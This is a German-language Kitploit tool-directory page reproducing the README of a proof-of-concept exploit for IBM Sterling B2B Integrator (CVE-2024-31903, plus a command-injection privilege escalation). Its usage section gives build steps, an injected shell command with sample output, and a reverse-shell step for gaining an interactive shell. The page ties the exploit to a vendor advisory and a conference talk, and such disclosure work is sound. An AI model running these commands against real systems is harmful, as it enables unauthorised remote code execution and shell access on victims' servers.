Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ibm-sterling-b2b-integrator-poc — PoC-Code für die LPE- und RCE-Angriffe (CVE-2024-31903) gegen den IBM Sterling B2B Integrator | Kitploit
Tools/GitHubGitHub/reverseclabs/ibm-sterling-b2b-integrator-poc
SchwachstellenanalyseExploitationPenetrationstestsCommand and ControlPayload-EntwicklungBinary-Exploitation
GitHubreverseclabs/ibm-sterling-b2b-integrator-poc

ibm-sterling-b2b-integrator-poc

PoC-Code für die LPE- und RCE-Angriffe (CVE-2024-31903) gegen den IBM Sterling B2B Integrator

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

IBM Sterling B2B Integrator PoC

Proof of Concept-Code für die Ausnutzung der Schwachstellen, die in IBM Sterling B2B Integrator, Versionen 6.2.0.0 bis 6.2.0.2 und 6.0.0.0 bis 6.1.2.5 für Linux, Windows und AIX-Systeme entdeckt wurden:

  • LPE-Befehlseinschleusung - wenn die Authentifizierung deaktiviert ist
  • Pre-Auth-Deserialisierung RCE - zugewiesen CVE-2024-31903, siehe die entsprechende IBM-Sicherheitswarnung hier: https://www.ibm.com/support/pages/node/7172233

Weitere Details zu diesen Problemen finden Sie in meinem DistricCon-Vortrag „To B or not 2B: Breaking the IBM B2B Integrator with, and without authentication“:

https://www.districtcon.org/bios-and-talks-2025/to-b-or-not-to-b

Repo-Struktur

Der größte Teil dieses Codes in diesem Repo bezieht sich auf den LPE-Befehlseinschleusungsangriff.

Der Python-Binärclient bin_client.py kann verwendet werden, um manuell Nachrichten an CLA2 zu senden, was die Ausnutzung der Deserialisierungs-RCE-Schwachstelle ermöglicht.

Verwendung

root@kitploit:~
$ java Main
$ Usage: Main <cmdLine> <outfile_or_SEND> [host] [port]

Der PoC akzeptiert zwei Parameter:

  • Den Shell-Befehl, der vom Ziel-CLA2-Client ausgeführt werden soll
  • Einen Pfad, um die serialisierte Java-Nachricht auf die Festplatte zu schreiben, um sie dann weiter zu analysieren/manuell mit etwas wie bin_client.py zu senden, oder die Zeichenfolge „SEND", um sie sofort an host:port zu senden, wo ein CLA2-Client zuhört
  • Anleitung

    Der in diesem Repository enthaltene Quellcode ist bewusst unvollständig, da bestimmte Klassen aus dem CLA2-Subsystem benötigt werden. Abhängig von den Dateisystemberechtigungen des Installationsverzeichnisses können Sie möglicherweise auf die JAR-Dateien zugreifen

    Angenommen, Sie haben die relevanten Dateien aus der JAR-Dekompilierung abgerufen. Sie werden hier nicht hochgeladen, da sie IBM-IP darstellen

    1. Dekompilieren Sie CLA2Client.jar

    2. Suchen Sie im dekompilierten Code die Dateien CmdLine2Result.java und CmdLine2Parms.java

    3. Kopieren und fügen Sie sie neben Main.java ein, um die Verzeichnisstruktur des ursprünglichen Java-Pakets der Anwendung zu replizieren

    root@kitploit:~
    /src/com/sterlingcommerce/woodstock/services/cmdline2/
    
    1. Kompilieren Sie das PoC-Programm - idealerweise mit dem von der Anwendung mitgelieferten JDK
    root@kitploit:~
    ${B2BHOME}/INSTALL/jdk/bin/javac src/com/sterlingcommerce/woodstock/services/cmdline2/*.java
    
    1. Führen Sie es aus - wiederum unter Verwendung des von der Anwendung mitgelieferten JDK, wenn möglich
    root@kitploit:~
    ${B2BHOME}/appl/SFG/INSTALL/jdk/bin/java -classpath src/ com.sterlingcommerce.woodstock.services.cmdline2.Main '/bin/sh -c "id > /tmp/result"' SEND 127.0.0.1 5052
    [+] Creating object...
    [+] Sending object to 127.0.0.1:5052...
    [+] ...Sent!
    [+] Receiving header...
    [+] ...header received: RESULT
    [+] Receiving result...
    [+] Result received:
    ##[DEBUG]## CmdLine2Result:
    fileSize=0
    outputNameLong=null
    outputNameShort=null
    ******* end of CmdLine2Result *******
    [+] clr.statusRpt:       null
    [+] clr.exceptionString: null
    [+] clr.somethingToLog:  CmdLine2Thread.runCommand: cmdLine before execution=/bin/sh -c "id > /tmp/result"
    ##[REMOTE DEBUG]## parm0=/bin/sh
    ##[REMOTE DEBUG]## parm1=-c
    ##[REMOTE DEBUG]## parm2=id > /tmp/result 
    
    1. (Optional) Um eine vollständig interaktive Shell zu erhalten, laden Sie die Skripte revshell.py und revshell_listener.py auf das Zielsystem hoch und starten Sie den Listener. Ersetzen Sie dann den Befehls-Parameter des PoC durch einen Aufruf des Reverse-Shell-Skripts wie unten:
    root@kitploit:~
    ${B2BHOME}/INSTALL/jdk/bin/java -classpath src/ com.sterlingcommerce.woodstock.services.cmdline2.Main 'python3 /tmp/revshell.py 9090' SEND
    
    Tool herunterladen